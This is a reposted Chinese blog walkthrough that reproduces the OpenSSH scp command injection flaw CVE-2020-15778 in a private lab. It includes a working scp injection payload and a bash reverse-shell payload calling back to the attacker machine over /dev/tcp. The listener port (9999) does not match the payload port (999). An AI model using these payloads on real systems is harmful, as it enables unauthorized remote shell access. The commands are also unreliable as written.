OpenSSH 命令注入漏洞(CVE-2020-15778)


這個漏洞之前見過很多次,苦於大佬博客看不懂,今天看着我薛哥博客,哦豁,精湛,我也復現一下吧。

談談個人理解,openssh這個東西就是 開了22號端口的那個 ssh 看圖

 

 

是吧,openSSH_7.41,這個是我之前安裝的版本,而且我們在學習centos時,關於ssh 可能有人用過 scp ,這個是可以通過ssh傳輸文件的,之前我學習到這個命令時還做筆記了,復現漏洞的時候就覺得這個命令眼熟,沒想到這個命令會存在漏洞。(個人說法不嚴謹,見諒)

據大佬說這個漏洞影響版本:OpenSSH =< 8.3p1

ok廢話不多說,開練。

1、事先准備的環境

靶機centos7 :172.16.12.147

攻擊機kali :172.16.12.145

(值得一提:這個漏洞需要提前知道ssh密碼。。。哈哈,這個是因為有的ssh知道密碼也連不上,所以就有了通過scp執行命令了。)

注:如果有ssh沒裝的,rpm -qa | grep openssh 查看是否安裝了ssh服務;

安裝ssh:yum install openssh

ssh-keygen -t rsa 回車,在root下會生成一個隱藏文件夾 .ssh

ls -al 就可以看到倆個秘鑰文件,一個公鑰一個私鑰。。關於這個我得博客園還寫過一道關於私鑰泄露的ctf題。

 

2、嘗試通過scp寫入文件

在當前位置隨便創建一個文件,cmd.txt

 

 使用scp命令拷貝文件:

scp cmd.txt root@172.16.12.147:'`touch /tmp/ccc.txt` /tmp'

 

 

ok,kali機這邊顯示正常,那看下centos機/tmp目錄下有沒有新建進來

 

 

 正常寫進來了。

3、使用nc反彈shell

在kali機上=》命令:nc -lvp 9999

 

 

在kali機上新建窗口 =》反彈shell命令:

scp cmd.txt root@172.16.12.147:'`bash -i >& /dev/tcp/172.16.12.145/999 0>&1`/tmp/shell.txt'

 

 

 

 

完。

所有的故事從基石開始;山河遠闊,人間煙火,星河錯落,無一是你,無一不是你。

閱讀此文的皆是經天緯地之才,氣吞山河之志,上知天文下知地理,通宵古今學貫中西超凡脫俗之人。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM